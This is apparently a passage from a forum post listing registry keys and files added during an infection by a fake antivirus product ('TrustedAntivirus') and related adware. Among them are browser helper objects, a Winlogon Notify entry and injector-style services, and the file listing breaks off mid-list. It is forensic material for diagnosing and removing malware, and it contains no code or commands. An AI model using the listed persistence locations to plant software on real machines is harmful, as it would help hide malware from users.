HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Implemented Categories\{0DE86A57-2BAA-11CF-A229-00AA003D7352}
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Implemented Categories\{40FC6ED4-2438-11CF-A3DB-080036F12502}
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Implemented Categories\{40FC6ED5-2438-11CF-A3DB-080036F12502}
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\InprocServer32
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\MiscStatus
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\MiscStatus\1
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\ProgID
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Programmable
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\ToolboxBitmap32
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\TypeLib
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Version
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\VersionIndependentProgID
HKEY_CLASSES_ROOT\CLSID\{48E59294-9880-11CF-9754-00AA00C00908}
HKEY_CLASSES_ROOT\CLSID\{48E59294-9880-11CF-9754-00AA00C00908}\InprocServer32
HKEY_CLASSES_ROOT\CLSID\{48E59295-9880-11CF-9754-00AA00C00908}
HKEY_CLASSES_ROOT\CLSID\{48E59295-9880-11CF-9754-00AA00C00908}\InprocServer32
HKEY_CLASSES_ROOT\CLSID\{5C3F6257-3E00-45c2-88D5-CB0F3A17BF0E}
HKEY_CLASSES_ROOT\CLSID\{5C3F6257-3E00-45c2-88D5-CB0F3A17BF0E}\InprocServer32
HKEY_CLASSES_ROOT\CLSID\{5C3F6257-3E00-45c2-88D5-CB0F3A17BF0E}\ProgID
HKEY_CLASSES_ROOT\CLSID\{5C3F6257-3E00-45c2-88D5-CB0F3A17BF0E}\Programmable
HKEY_CLASSES_ROOT\CLSID\{5C3F6257-3E00-45c2-88D5-CB0F3A17BF0E}\TypeLib
HKEY_CLASSES_ROOT\CLSID\{5C3F6257-3E00-45c2-88D5-CB0F3A17BF0E}\VersionIndependentProgID
HKEY_CLASSES_ROOT\CLSID\{6F87F145-DC2D-4766-AF03-3A3B96FFAD98}
HKEY_CLASSES_ROOT\CLSID\{6F87F145-DC2D-4766-AF03-3A3B96FFAD98}\InprocServer32
HKEY_CLASSES_ROOT\CLSID\{6F87F145-DC2D-4766-AF03-3A3B96FFAD98}\ProgID
HKEY_CLASSES_ROOT\CLSID\{6F87F145-DC2D-4766-AF03-3A3B96FFAD98}\Programmable
HKEY_CLASSES_ROOT\CLSID\{6F87F145-DC2D-4766-AF03-3A3B96FFAD98}\TypeLib
HKEY_CLASSES_ROOT\CLSID\{6F87F145-DC2D-4766-AF03-3A3B96FFAD98}\VersionIndependentProgID
HKEY_CLASSES_ROOT\InetCtls.Inet
HKEY_CLASSES_ROOT\InetCtls.Inet\CLSID
HKEY_CLASSES_ROOT\InetCtls.Inet\CurVer
HKEY_CLASSES_ROOT\InetCtls.Inet.1
HKEY_CLASSES_ROOT\InetCtls.Inet.1\CLSID
HKEY_CLASSES_ROOT\Interface\{48E59291-9880-11CF-9754-00AA00C00908}
HKEY_CLASSES_ROOT\Interface\{48E59291-9880-11CF-9754-00AA00C00908}\ProxyStubClsid
HKEY_CLASSES_ROOT\Interface\{48E59291-9880-11CF-9754-00AA00C00908}\ProxyStubClsid32
HKEY_CLASSES_ROOT\Interface\{48E59291-9880-11CF-9754-00AA00C00908}\TypeLib
HKEY_CLASSES_ROOT\Interface\{48E59292-9880-11CF-9754-00AA00C00908}
HKEY_CLASSES_ROOT\Interface\{48E59292-9880-11CF-9754-00AA00C00908}\ProxyStubClsid
HKEY_CLASSES_ROOT\Interface\{48E59292-9880-11CF-9754-00AA00C00908}\ProxyStubClsid32
HKEY_CLASSES_ROOT\Interface\{48E59292-9880-11CF-9754-00AA00C00908}\TypeLib
HKEY_CLASSES_ROOT\PopupBlocker.IEGPB
HKEY_CLASSES_ROOT\PopupBlocker.IEGPB\CLSID
HKEY_CLASSES_ROOT\PopupBlocker.IEGPB\CurVer
HKEY_CLASSES_ROOT\PopupBlocker.IEGPB.1
HKEY_CLASSES_ROOT\PopupBlocker.IEGPB.1\CLSID
HKEY_CLASSES_ROOT\SBIEBHO.IEFW
HKEY_CLASSES_ROOT\SBIEBHO.IEFW\CLSID
HKEY_CLASSES_ROOT\SBIEBHO.IEFW\CurVer
HKEY_CLASSES_ROOT\SBIEBHO.IEFW.2
HKEY_CLASSES_ROOT\SBIEBHO.IEFW.2\CLSID
HKEY_CLASSES_ROOT\TypeLib\{48E59290-9880-11CF-9754-00AA00C00908}
HKEY_CLASSES_ROOT\TypeLib\{48E59290-9880-11CF-9754-00AA00C00908}\1.0
HKEY_CLASSES_ROOT\TypeLib\{48E59290-9880-11CF-9754-00AA00C00908}\1.0\0
HKEY_CLASSES_ROOT\TypeLib\{48E59290-9880-11CF-9754-00AA00C00908}\1.0\0\win32
HKEY_CLASSES_ROOT\TypeLib\{48E59290-9880-11CF-9754-00AA00C00908}\1.0\FLAGS
HKEY_CLASSES_ROOT\TypeLib\{48E59290-9880-11CF-9754-00AA00C00908}\1.0\HELPDIR
HKEY_CLASSES_ROOT\TypeLib\{D761645B-6B20-4698-AEE8-729981152A82}
HKEY_CLASSES_ROOT\TypeLib\{D761645B-6B20-4698-AEE8-729981152A82}\1.0
HKEY_CLASSES_ROOT\TypeLib\{D761645B-6B20-4698-AEE8-729981152A82}\1.0\0
HKEY_CLASSES_ROOT\TypeLib\{D761645B-6B20-4698-AEE8-729981152A82}\1.0\0\win32
HKEY_CLASSES_ROOT\TypeLib\{D761645B-6B20-4698-AEE8-729981152A82}\1.0\FLAGS
HKEY_CLASSES_ROOT\TypeLib\{D761645B-6B20-4698-AEE8-729981152A82}\1.0\HELPDIR
HKEY_CLASSES_ROOT\TypeLib\{EA7522F6-87CF-411E-8A55-19EE4344B676}
HKEY_CLASSES_ROOT\TypeLib\{EA7522F6-87CF-411E-8A55-19EE4344B676}\1.0
HKEY_CLASSES_ROOT\TypeLib\{EA7522F6-87CF-411E-8A55-19EE4344B676}\1.0\0
HKEY_CLASSES_ROOT\TypeLib\{EA7522F6-87CF-411E-8A55-19EE4344B676}\1.0\0\win32
HKEY_CLASSES_ROOT\TypeLib\{EA7522F6-87CF-411E-8A55-19EE4344B676}\1.0\FLAGS
HKEY_CLASSES_ROOT\TypeLib\{EA7522F6-87CF-411E-8A55-19EE4344B676}\1.0\HELPDIR
HKEY_CLASSES_ROOT\WR
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\24ebc7a7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\DownloadManager
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ESENT\Process\ipconfig
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ESENT\Process\ipconfig\DEBUG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{0EBB0A8F-A20B-445C-9BC2-8D18256AC6BD}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{22342B44-5B98-4B30-9D53-C182AD8DF217}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{5C3F6257-3E00-45C2-88D5-CB0F3A17BF0E}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{6F87F145-DC2D-4766-AF03-3A3B96FFAD98}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3877C2CD-F137-4144-BDB2-0A811492F920}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A394E835-C8D6-4B4B-884B-D2709059F3BE}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Outerinfo
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\UAVUN_is1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\fccbbya
HKEY_LOCAL_MACHINE\SOFTWARE\Products
HKEY_LOCAL_MACHINE\SOFTWARE\Rhao
HKEY_LOCAL_MACHINE\SOFTWARE\TrustedAntivirus
HKEY_LOCAL_MACHINE\SOFTWARE\TrustedAntivirus\Settings
HKEY_LOCAL_MACHINE\SOFTWARE\ugac
HKEY_LOCAL_MACHINE\SOFTWARE\xpre
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_CMDSERVICE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_CMDSERVICE\0000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_CMDSERVICE\0000\Control
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_MCHINJDRV
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_MCHINJDRV\0000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_MCHINJDRV\0000\Control
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_NETWORK_MONITOR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_NETWORK_MONITOR\0000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_NETWORK_MONITOR\0000\Control
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\cmdService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\cmdService\Enum
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\cmdService\Security
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\dhlp
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\dhlp\Enum
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\dhlp\Security
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\mchInjDrv
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\mchInjDrv\Enum
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Network Monitor
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Network Monitor\Enum
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Network Monitor\Security
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_CMDSERVICE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_CMDSERVICE\0000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_MCHINJDRV
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_MCHINJDRV\0000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_NETWORK_MONITOR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_NETWORK_MONITOR\0000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\cmdService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\cmdService\Security
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\mchInjDrv
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Network Monitor
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Network Monitor\Security
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_CMDSERVICE
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_CMDSERVICE\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_CMDSERVICE\0000\Control
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MCHINJDRV
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MCHINJDRV\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MCHINJDRV\0000\Control
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_NETWORK_MONITOR
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_NETWORK_MONITOR\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_NETWORK_MONITOR\0000\Control
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\cmdService
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\cmdService\Enum
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\cmdService\Security
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\dhlp
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\dhlp\Enum
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\dhlp\Security
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mchInjDrv
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mchInjDrv\Enum
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Network Monitor
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Network Monitor\Enum
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Network Monitor\Security


Values added & changed: [attachmentid=782]

Disk contents.
QUOTE
Drives tracked: 1
-----------------
* c:\

Folders added:
-----------------
c:\Documents and Settings\All Users\Application Data\SalesMon
c:\Documents and Settings\All Users\Application Data\SalesMon\Data
c:\Documents and Settings\All Users\Start Menu\Programs\TrustedAntivirus
c:\Documents and Settings\KLY\Application Data\TrustedAntivirus
c:\Documents and Settings\KLY\Application Data\TrustedAntivirus\Logs
c:\Documents and Settings\KLY\Local Settings\Temp\ICD1.tmp
c:\Documents and Settings\KLY\Local Settings\Temp\NI.UGA6P_0001_N122M2802
c:\Documents and Settings\KLY\Local Settings\Temp\ScnTmp
c:\Documents and Settings\LocalService\Application Data\NetMon
c:\Documents and Settings\LocalService\Local Settings\Application Data\Microsoft\Internet Explorer
c:\Documents and Settings\NetworkService\Application Data\NetMon
c:\Program Files\Common Files\TrustedAntivirus
c:\Program Files\Network Monitor
c:\Program Files\TrustedAntivirus
c:\Program Files\TrustedAntivirus\Config
c:\Program Files\TrustedAntivirus\Dat
c:\Program Files\TrustedAntivirus\Engines
c:\Program Files\TrustedAntivirus\Engines\AWBase
c:\Program Files\TrustedAntivirus\Engines\AWBase\database
c:\Program Files\TrustedAntivirus\Engines\PGBase
c:\Program Files\TrustedAntivirus\Engines\plugins
c:\Program Files\TrustedAntivirus\Engines\plugins\UpDate
c:\Program Files\TrustedAntivirus\Graphics
c:\Program Files\TrustedAntivirus\LA
c:\Program Files\TrustedAntivirus\Tools
c:\Program Files\TrustedAntivirus\Up
c:\Program Files\TrustedAntivirus\Up\Download
c:\Temp
c:\Temp\1cb
c:\Temp\sanR24
c:\TrustedAntivirus
c:\TrustedAntivirus\AVQuar
c:\WINDOWS\S0xZ
c:\WINDOWS\system32\ax9
c:\WINDOWS\system32\bv2
c:\WINDOWS\system32\ev4
c:\WINDOWS\system32\iDlo01

Files added:
----------------
c:\Documents and Settings\All Users\Desktop\TrustedAntivirus.lnk
Date: 3/6/2008 11:02 PM
Size: 1,599 bytes
c:\Documents and Settings\All Users\Start Menu\Programs\TrustedAntivirus\Contact Customer Support.lnk
Date: 3/6/2008 11:02 PM
Size: 1,567 bytes
c:\Documents and Settings\All Users\Start Menu\Programs\TrustedAntivirus\TrustedAntivirus.lnk
Date: 3/6/2008 11:02 PM
Size: 1,611 bytes
c:\Documents and Settings\All Users\Start Menu\Programs\TrustedAntivirus\Uninstall TrustedAntivirus.lnk
Date: 3/6/2008 11:02 PM
Size: 1,652 bytes
c:\Documents and Settings\KLY\Application Data\TrustedAntivirus\Logs\threats.log
Date: 3/6/2008 11:02 PM
Size: 0 bytes
c:\Documents and Settings\KLY\Application Data\TrustedAntivirus\Logs\update.log
Date: 3/6/2008 11:05 PM
Size: 4,251 bytes
c:\Documents and Settings\KLY\Local Settings\Temp\~DF7077.tmp
Date: 3/6/2008 11:05 PM
Size: 327,680 bytes
c:\Documents and Settings\KLY\Local Settings\Temp\~uavsetup.exe
Date: 3/6/2008 11:01 PM
Size: 15,712,233 bytes
c:\Documents and Settings\KLY\Local Settings\Temp\removalfile.bat
Date: 3/6/2008 10:50 PM
Size: 43 bytes
c:\Documents and Settings\KLY\Local Settings\Temp\sqlite_5J4QbTdgCcOLwo2
Date: 3/6/2008 11:03 PM
Size: 0 bytes
c:\Documents and Settings\KLY\Local Settings\Temp\sqlite_rEvawTY4Fgm0efD
Date: 3/6/2008 11:02 PM
Size: 0 bytes
c:\Documents and Settings\KLY\Local Settings\Temp\yazzsnet.exe
Date: 3/6/2008 10:37 PM
Size: 218,632 bytes
c:\Documents and Settings\KLY\Local Settings\Temp\ICD1.tmp\UGA6P_0001_N122M2802NetInstaller.exe
Date: 2/28/2008 4:57 PM
Size: 185,344 bytes
c:\Documents and Settings\KLY\Local Settings\Temp\ICD1.tmp\UGA6P_0001_N122M2802NetInstaller.inf
Date: 2/28/2008 4:57 PM
Size: 230 bytes
c:\Documents and Settings\KLY\Local Settings\Temp\NI.UGA6P_0001_N122M2802\settings.ini
Date: 3/6/2008 11:03 PM
Size: 23 bytes
c:\Documents and Settings\KLY\Local Settings\Temp\NI.UGA6P_0001_N122M2802\setup.exe
Date: 3/6/2008 11:00 PM
Size: 15,760,928 bytes
c:\Documents and Settings\KLY\Local Settings\Temp\NI.UGA6P_0001_N122M2802\setup.len
Date: 3/6/2008 10:58 PM
Size: 4 bytes
c:\Documents and Settings\KLY\Local Settings\Temporary Internet Files\Content.IE5\230H05OX\CA6P2ZCX.HTM
Date: 3/6/2008 10:33 PM
Size: 1,176 bytes
c:\Documents and Settings\KLY\Local Settings\Temporary Internet Files\Content.IE5\230H05OX\CASNUHWN.HTM
Date: 3/6/2008 10:44 PM
Size: 1,176 bytes
c:\Documents and Settings\KLY\Local Settings\Temporary Internet Files\Content.IE5\230H05OX\serve[1].htm
Date: 3/6/2008 10:31 PM
Size: 945 bytes
c:\Documents and Settings\KLY\Local Settings\Temporary Internet Files\Content.IE5\GTCHOJAZ\install_en[1].cab
Date: 3/6/2008 10:44 PM
Size: 102,666 bytes
c:\Documents and Settings\KLY\Local Settings\Temporary Internet Files\Content.IE5\GTCHOJAZ\placeholder-1786909-2517323253[1].htm
Date: 3/6/2008 10:31 PM
Size: 1,443 bytes
c:\Documents and Settings\KLY\Local Settings\Temporary Internet Files\Content.IE5\GTCHOJAZ\tc2[1].txt
Date: 3/6/2008 11:03 PM
Size: 4,778 bytes
c:\Documents and Settings\KLY\Local Settings\Temporary Internet Files\Content.IE5\KLQVS92F\CAF2O7NP.htm
Date: 3/6/2008 10:44 PM
Size: 125 bytes
c:\Documents and Settings\KLY\Local Settings\Temporary Internet Files\Content.IE5\KLQVS92F\CASP67K1.htm
Date: 3/6/2008 11:03 PM
Size: 0 bytes
c:\Documents and Settings\KLY\Local Settings\Temporary Internet Files\Content.IE5\KLQVS92F\data[1].htm
Date: 3/6/2008 10:44 PM
Size: 25,507 bytes
c:\Documents and Settings\KLY\Local Settings\Temporary Internet Files\Content.IE5\KLURCDYF\winavp[1].htm
Date: 3/6/2008 10:45 PM
Size: 502 bytes
c:\Documents and Settings\KLY\Start Menu\Programs\Startup\DW_Start.lnk
Date: 3/6/2008 10:47 PM
Size: 0 bytes
c:\Documents and Settings\LocalService\Application Data\NetMon\domains.txt
Date: 3/6/2008 11:07 PM
Size: 14 bytes
c:\Documents and Settings\LocalService\Application Data\NetMon\log.txt
Date: 3/6/2008 11:07 PM
Size: 372 bytes
c:\Documents and Settings\LocalService\Local Settings\Application Data\Microsoft\Internet Explorer\MSIMGSIZ.DAT
Date: 3/6/2008 11:03 PM
Size: 16,384 bytes
c:\Documents and Settings\LocalService\Local Settings\History\History.IE5\MSHist012008030620080307\index.dat
Date: 3/6/2008 11:03 PM
Size: 32,768 bytes
c:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\1IXK5YVH\march_of_dimes_bg[1].gif
Date: 3/6/2008 11:03 PM
Size: 319 bytes
c:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\8XOTC1Z9\command_small[1].gif
Date: 3/6/2008 11:03 PM
Size: 2,417 bytes
c:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\8XOTC1Z9\march_of_dimes[1].gif
Date: 3/6/2008 11:03 PM
Size: 24,981 bytes
c:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\KFCF67AN\intro[1].htm
Date: 3/6/2008 11:03 PM
Size: 2,317 bytes
c:\Documents and Settings\NetworkService\Application Data\NetMon\domains.txt
Date: 3/6/2008 10:54 PM
Size: 14 bytes
c:\Documents and Settings\NetworkService\Application Data\NetMon\log.txt
Date: 3/6/2008 10:54 PM
Size: 248 bytes
c:\Program Files\Common Files\Yazzle1281OinAdmin.exe
Date: 1/15/2008 10:52 PM
Size: 140,800 bytes
c:\Program Files\Common Files\Yazzle1281OinUninstaller.exe
Date: 3/6/2008 10:50 PM
Size: 41,723 bytes
c:\Program Files\Common Files\TrustedAntivirus\bm.exe
Date: 12/20/2007 8:12 PM
Size: 425,984 bytes
c:\Program Files\Common Files\TrustedAntivirus\ugac.exe
Date: 5/22/2007 1:06 PM
Size: 271,360 bytes
c:\Program Files\Internet Explorer\xabe89104.dll
Date: 2/8/2008 2:07 AM
Size: 217,088 bytes
c:\Program Files\Network Monitor\netmon.exe
Date: 1/4/2006 6:09 PM
Size: 94,208 bytes
c:\Program Files\TrustedAntivirus\Activate.exe
Date: 7/31/2007 8:13 AM
Size: 152,064 bytes
c:\Program Files\TrustedAntivirus\al.dat
Date: 11/7/2007 5:31 PM
Size: 131 bytes
c:\Program Files\TrustedAntivirus\dhlp.dll
Date: 12/6/2007 8:20 PM
Size: 196,608 bytes
c:\Program Files\TrustedAntivirus\FWSettings.bin
Date: 3/6/2008 11:02 PM
Size: 18 bytes
c:\Program Files\TrustedAntivirus\history.db
Date: 3/6/2008 11:03 PM
Size: 23,552 bytes
c:\Program Files\TrustedAntivirus\main.log
Date: 3/6/2008 11:03 PM
Size: 790 bytes
c:\Program Files\TrustedAntivirus\pgs.exe
Date: 12/7/2007 11:03 AM
Size: 2,097,152 bytes
c:\Program Files\TrustedAntivirus\ptask.exe
Date: 11/27/2007 5:31 PM
Size: 28,672 bytes
c:\Program Files\TrustedAntivirus\reload.exe
Date: 11/27/2007 5:31 PM
Size: 161,792 bytes
c:\Program Files\TrustedAntivirus\ResErrors.log
Date: 3/6/2008 11:08 PM
Size: 84,524 bytes
c:\Program Files\TrustedAntivirus\scnkrnl.dll
Date: 11/27/2007 5:29 PM
Size: 569,344 bytes
c:\Program Files\TrustedAntivirus\settings.ini
Date: 3/6/2008 11:02 PM
Size: 1,641 bytes
c:\Program Files\TrustedAntivirus\sqlite3.dll
Date: 8/9/2006 10:29 AM
Size: 247,232 bytes
c:\Program Files\TrustedAntivirus\sr.log
Date: 3/6/2008 11:02 PM
Size: 232 bytes
c:\Program Files\TrustedAntivirus\unins000.dat
Date: 3/6/2008 11:02 PM
Size: 33,887 bytes
c:\Program Files\TrustedAntivirus\unins000.exe
Date: 3/6/2008 11:01 PM
Size: 682,364 bytes
c:\Program Files\TrustedAntivirus\Config\pgs.xml
Date: 3/6/2008 11:01 PM
Size: 8,819,841 bytes
c:\Program Files\TrustedAntivirus\Dat\Activate.dat
Date: 3/6/2008 11:02 PM
Size: 314 bytes
c:\Program Files\TrustedAntivirus\Dat\BkSites.dat
Date: 10/31/2007 12:20 PM
Size: 283,541 bytes
c:\Program Files\TrustedAntivirus\Dat\bnlink.dat
Date: 3/6/2008 11:02 PM
Size: 220 bytes
c:\Program Files\TrustedAntivirus\Dat\cd.dat
Date: 11/14/2007 11:15 AM
Size: 119 bytes
c:\Program Files\TrustedAntivirus\Dat\incmp.dat
Date: 4/5/2006 10:00 AM
Size: 129 bytes
c:\Program Files\TrustedAntivirus\Dat\index.dat
Date: 12/14/2006 3:17 PM
Size: 6 bytes
c:\Program Files\TrustedAntivirus\Dat\pv.dat
Date: 3/6/2008 11:02 PM
Size: 9 bytes
c:\Program Files\TrustedAntivirus\Engines\AWBase\vbpv.dat
Date: 7/13/2007 11:12 AM
Size: 10 bytes
c:\Program Files\TrustedAntivirus\Engines\AWBase\database\enemies.dat
Date: 7/13/2007 11:09 AM
Size: 11,642,713 bytes
c:\Program Files\TrustedAntivirus\Engines\PGBase\vbpv.dat
Date: 8/1/2005 3:42 PM
Size: 8 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\BORLNDMM.DLL
Date: 5/8/2007 12:10 PM
Size: 22,528 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\SCANADWR.DLL
Date: 5/8/2007 11:58 AM
Size: 246,310 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\SCANBCDR.DLL
Date: 5/8/2007 11:59 AM
Size: 913,355 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\SCANDLDR.DLL
Date: 5/8/2007 12:00 PM
Size: 1,123,285 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\SCANDOS1.DLL
Date: 5/8/2007 12:02 PM
Size: 1,265,683 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\SCANEMUL.DLL
Date: 5/8/2007 12:02 PM
Size: 28,301 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\SCANFUNC.DLL
Date: 5/8/2007 12:02 PM
Size: 63,004 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\SCANKRNL.DLL
Date: 11/23/2007 4:47 PM
Size: 293,888 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\SCANMCR1.DLL
Date: 5/8/2007 12:08 PM
Size: 200,849 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\SCANOTHR.DLL
Date: 5/8/2007 12:03 PM
Size: 40,707 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\SCANSCR.DLL
Date: 5/8/2007 11:57 AM
Size: 276,532 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\SCANTOOL.DLL
Date: 5/8/2007 12:03 PM
Size: 114,320 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\SCANTROJ.DLL
Date: 5/8/2007 12:03 PM
Size: 1,045,102 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\SCANWIN1.DLL
Date: 5/8/2007 12:04 PM
Size: 836,351 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\UNACPU.DLL
Date: 5/8/2007 12:04 PM
Size: 9,728 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\UNADBX.DLL
Date: 5/8/2007 12:10 PM
Size: 286,720 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\unamscan.dll
Date: 5/8/2007 12:10 PM
Size: 47,616 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\UNMIME.DLL
Date: 5/8/2007 12:04 PM
Size: 44,202 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\UNPACK.DLL
Date: 5/8/2007 12:10 PM
Size: 331,275 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\UNPACKS.DLL
Date: 5/8/2007 12:04 PM
Size: 373,419 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\UNPACKS2.DLL
Date: 5/8/2007 12:06 PM
Size: 73,091 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\UNPEPACK.DLL
Date: 5/8/2007 12:04 PM
Size: 69,211 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\vbpv.dat
Date: 5/8/2007 12:12 PM
Size: 10 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\UpDate\UA27601.DLL
Date: 5/8/2007 11:57 AM
Size: 113,369 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\UpDate\UA27602.DLL
Date: 5/8/2007 11:56 AM
Size: 153,123 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\UpDate\UA27603.DLL
Date: 5/8/2007 11:56 AM
Size: 165,473 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\UpDate\UA27604.DLL
Date: 5/8/2007 11:56 AM
Size: 170,921 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\UpDate\UADAILY.DLL
Date: 5/8/2007 11:55 AM
Size: 65,256 bytes
c:\Program Files\TrustedAntivirus\Graphics\cross.gif
Date: 2/7/2006 11:40 AM
